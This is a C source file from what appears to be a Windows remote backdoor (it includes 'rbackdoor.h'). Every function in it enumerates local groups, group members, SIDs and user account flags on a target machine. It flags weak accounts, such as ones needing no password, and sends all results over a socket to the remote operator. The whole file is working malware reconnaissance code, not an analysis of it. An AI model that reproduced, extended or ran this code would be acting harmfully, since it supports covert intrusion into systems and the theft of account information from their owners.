#include "rbackdoor.h"

/*************************************************************/
/* Collect All groups on the remote Box                      */
/*************************************************************/

int CollectGroups(LPCSTR lpszMachineName)
{
	NET_API_STATUS NetStatus = NERR_Success;
	LPBYTE Data = NULL;
	DWORD Index = 0, ResumeHandle = 0, Total = 0, i, dwLastError = 0;
	LOCALGROUP_INFO_0 *GroupInfo;
	BOOL bRet = TRUE;
	WCHAR wszMachineName[256];
	char szOutString[256], szAnsiName[256];
	int  iRetOp = 0;
	
	if (lpszMachineName && *lpszMachineName)
	{
		iRetOp = MultiByteToWideChar ((UINT)CP_ACP, (DWORD)MB_PRECOMPOSED, (LPCSTR)lpszMachineName, (int)-1,(LPWSTR)wszMachineName,(int)sizeof(wszMachineName));
		
		if (iRetOp == 0) {
			dwLastError = GetLastError();
			bRet = FALSE;
			goto CollectGroups_0;
		}
	}
	else wcscpy (wszMachineName, (const wchar_t*)"");
	
	NetStatus = NetLocalGroupEnum(wszMachineName, 0, &Data,8192, &Index, &Total, &ResumeHandle);
	if (NetStatus != NERR_Success || Data == NULL) {
		dwLastError = GetLastError();
		bRet = FALSE;
		goto CollectGroups_0;
	}
	
	sprintf (szOutString, "%d", Total);
	rsend(ConnectSocket, "*******************************************\n");
	rsend(ConnectSocket, "Number of groups : ");
	rsend(ConnectSocket, szOutString);
	rsend(ConnectSocket, "\n");
	rsend(ConnectSocket, "*******************************************\n");
	
	GroupInfo = (LOCALGROUP_INFO_0 *)Data;
	for (i=0; i < Total; i++)
	{
		iRetOp = WideCharToMultiByte((UINT)CP_ACP,(DWORD)0,(LPCWSTR)(GroupInfo->lgrpi0_name),(int)-1,(LPSTR)szAnsiName,(int)(sizeof(szAnsiName)),(LPCSTR)NULL,(LPBOOL)NULL);
		
		rsend(ConnectSocket, "\n-------------------------------------------\n");
		sprintf (szOutString, "=> GROUP %d : %s\n", i + 1, szAnsiName);
		rsend(ConnectSocket, szOutString);
		rsend(ConnectSocket, "-------------------------------------------\n\n");
		strcpy (szOutString, "");
		
		LookupSID ((LPCTSTR)lpszMachineName, (LPCTSTR)szAnsiName);
		CollectMembers((LPCTSTR)lpszMachineName, (LPCTSTR)szAnsiName);
		
		GroupInfo++;
	}
	rsend(ConnectSocket, "\n*******************************************\n");
	
	
	
	CollectGroups_0:
	if (Data)  NetApiBufferFree(Data);
	
	return(0);
}

/*************************************************************/
/* Collect SID                                               */
/*************************************************************/

long LookupSID(LPCTSTR lpszMachineName, LPCTSTR lpszAccountName)
{
	SID_IDENTIFIER_AUTHORITY sid_identifier_authority;
	PSID_IDENTIFIER_AUTHORITY psid_identifier_authority = NULL;
	BOOL				bRetOp = FALSE;
	PSID				pSid = NULL;
	DWORD				dwSidSize, dwDomainNameSize, dwLastError = 0;
	BYTE				bySidBuffer[1024];
	SID_NAME_USE		sidType;
	PUCHAR			    puchar_SubAuthCount = NULL;
	int				    i;
	unsigned char       j = 0;
	long				lRet = 0;
	char				szDomainName[1024], szSID[256], szIdentAuthValue[80], *buffer;
	
	
	pSid = (PSID)bySidBuffer;
	dwSidSize = sizeof(bySidBuffer);
	dwDomainNameSize = sizeof(szDomainName);
	bRetOp = LookupAccountName((LPCTSTR)lpszMachineName,(LPCTSTR)lpszAccountName,(PSID)pSid,(LPDWORD)&dwSidSize,(LPTSTR)szDomainName,(LPDWORD)&dwDomainNameSize,(PSID_NAME_USE)&sidType);
	
	if (bRetOp == FALSE) {
		dwLastError = GetLastError();
		lRet = -1;
		goto LookupSID_0;
	}
	bRetOp = IsValidSid((PSID)pSid);
	
	if (bRetOp == FALSE) {
		dwLastError = GetLastError();
		lRet = -2;
		goto LookupSID_0;
	}
	
	sprintf (szSID, "S-%d", (((SID*)pSid) -> Revision));
	psid_identifier_authority = GetSidIdentifierAuthority ((PSID)pSid);
	memcpy (&sid_identifier_authority, psid_identifier_authority, sizeof(SID_IDENTIFIER_AUTHORITY));
	sprintf (szIdentAuthValue, "-%d", (sid_identifier_authority.Value)[5]);
	strcat (szSID, szIdentAuthValue);
	puchar_SubAuthCount = (PUCHAR)GetSidSubAuthorityCount((PSID)pSid);
	j = (unsigned char)(*puchar_SubAuthCount);
	
	for (i = 0; i < (int)j; i++)
	{
		DWORD dwSubAuth = 0;
		PDWORD pdwSubAuth = NULL;
		char *szSubAuthValue;
		
		szSubAuthValue = (char *)GlobalAlloc(GPTR, 80);
		
		pdwSubAuth = (PDWORD)GetSidSubAuthority((PSID)pSid, (DWORD)i);
		dwSubAuth = *pdwSubAuth;
		sprintf (szSubAuthValue, "-%d", dwSubAuth);
		strcat (szSID, szSubAuthValue);
		GlobalFree(szSubAuthValue);
	}
	
	buffer = (char *)GlobalAlloc(GPTR, 1024);
	sprintf(buffer, "SID : %s\n", szSID);
	rsend(ConnectSocket, buffer);
	
	GlobalFree(buffer);
	
	LookupSID_0:
	
	return(0);
}

/*************************************************************/
/* Collect All Members on the remote Box                     */
/*************************************************************/

int CollectMembers(LPCTSTR lpszMachineName, LPCTSTR lpszGroupName)
{
	NET_API_STATUS			NetStatus = NERR_Success;
	LPBYTE					Data = NULL;
	DWORD						Index = 0, ResumeHandle = 0, Total = 0, i, dwLastError = 0;
	LOCALGROUP_MEMBERS_INFO_1 *MemberInfo;
	WCHAR						wszMachineName[256], wszGroupName[256];
	BOOL						bRet = TRUE;
	char						szAnsiMemberName[256], szSID[256];
	int						iRetOp = 0;
	
	
	if (lpszMachineName && *lpszMachineName)  {
		iRetOp = MultiByteToWideChar((UINT)CP_ACP,(DWORD)MB_PRECOMPOSED,(LPCSTR)lpszMachineName,(int)-1, (LPWSTR)wszMachineName,(int)sizeof(wszMachineName));
		
		if (iRetOp == 0) {
			dwLastError = GetLastError();
			bRet = FALSE;
			goto CollectMembers_0;
		}
	}
	else wcscpy (wszMachineName, (const wchar_t*)"");
	
	iRetOp = MultiByteToWideChar((UINT)CP_ACP,(DWORD)MB_PRECOMPOSED,(LPCSTR)lpszGroupName,(int)-1,(LPWSTR)wszGroupName,(int)sizeof(wszGroupName));
	
	if (iRetOp == 0) {
		dwLastError = GetLastError();
		bRet = FALSE;
		goto CollectMembers_0;
	}
	
	NetStatus = NetLocalGroupGetMembers(wszMachineName, wszGroupName, 1, &Data, 8192, &Index,  &Total, &ResumeHandle);
	
	if (NetStatus != NERR_Success || Data == NULL)
	{
		dwLastError = GetLastError();
		
		if (dwLastError == ERROR_ENVVAR_NOT_FOUND)
		{
			NetStatus = NetLocalGroupGetMembers(wszMachineName, wszGroupName, 0, &Data, 8192, &Index, &Total, &ResumeHandle);
			sprintf (szSID, "MEMBER_COUNT : %d", Total);
			rsend(ConnectSocket, szSID);
			rsend(ConnectSocket, "\n");
		}
		bRet = FALSE;
		goto CollectMembers_0;
	}
	
	MemberInfo = (LOCALGROUP_MEMBERS_INFO_1 *)Data;
	for (i=0; i < Total; i++)
	{
		iRetOp = WideCharToMultiByte((UINT)CP_ACP,(DWORD)0,(LPCWSTR)(MemberInfo->lgrmi1_name),(int)-1,(LPSTR)szAnsiMemberName,(int)(sizeof(szAnsiMemberName)),(LPCSTR)NULL, (LPBOOL)NULL);
		
		if (iRetOp == 0)
			dwLastError = GetLastError();
		
		sprintf (szSID, " - [%s]\t", szAnsiMemberName);
		rsend(ConnectSocket, szSID);
		strcpy (szSID, "");
		LookupSID ((LPCTSTR)lpszMachineName, (LPCTSTR)szAnsiMemberName);
		MemberInfo++;
	}
	
	CollectMembers_0:
	if (Data)  NetApiBufferFree(Data);
	
	return(0);
}

/*************************************************************/
/* Recupre des informations sur un utilisateur donn        */
/*************************************************************/

int get_usr_info(char *host, char *user)
{
   NET_API_STATUS nas;
   USER_INFO_1    usrinfos;
   LPBYTE         *buf = NULL;

   if(strlen(host) < 1 || strlen(user) < 1)
   {
	   Proc_help("userinfo");
	   return(-1);
   }

   buf = (LPBYTE *)GlobalAlloc(GPTR, sizeof(USER_INFO_1));

   nas = NetUserGetInfo((unsigned short *)AsWideString(host), (unsigned short *)AsWideString(user), 1, buf);
   
   rsend(ConnectSocket, "\n > USER NAME : ");
   rsend(ConnectSocket, user);
   rsend(ConnectSocket, "\n > USER ");
   LookupSID(host, user);
   
   if(nas){
     rsend(ConnectSocket, "Error: couldnt get user info.");
   }
   else{
     memcpy(&usrinfos, *buf, sizeof(USER_INFO_1));

     if( (UF_PASSWD_NOTREQD & usrinfos.usri1_flags) )
       rsend(ConnectSocket, " > ACCOUNT STATUS : password not required, how about that.\n");
     if( (UF_ACCOUNTDISABLE & usrinfos.usri1_flags) )
       rsend(ConnectSocket, " > ACCOUNT STATUS : account disabled\n");
     if( (UF_LOCKOUT & usrinfos.usri1_flags) )
       rsend(ConnectSocket, " > ACCOUNT STATUS : account locked out\n");
     if( (UF_DONT_EXPIRE_PASSWD & usrinfos.usri1_flags) )
       rsend(ConnectSocket, " > ACCOUNT STATUS : password doesnt expire\n");
     if( (UF_PASSWD_CANT_CHANGE & usrinfos.usri1_flags) )
       rsend(ConnectSocket, " > ACCOUNT STATUS : user cant change password\n");
     if( (UF_WORKSTATION_TRUST_ACCOUNT & usrinfos.usri1_flags) )
       rsend(ConnectSocket, " > ACCOUNT STATUS : account for some other box in this domain\n");
     if( (UF_SERVER_TRUST_ACCOUNT & usrinfos.usri1_flags) )
       rsend(ConnectSocket, " > ACCOUNT STATUS : account for what is prolly the BDC\n");
     if( (UF_INTERDOMAIN_TRUST_ACCOUNT & usrinfos.usri1_flags) )
       rsend(ConnectSocket, " > ACCOUNT STATUS : interdomain permit to trust account\n");
   }
   return(0);
   GlobalFree(buf);
}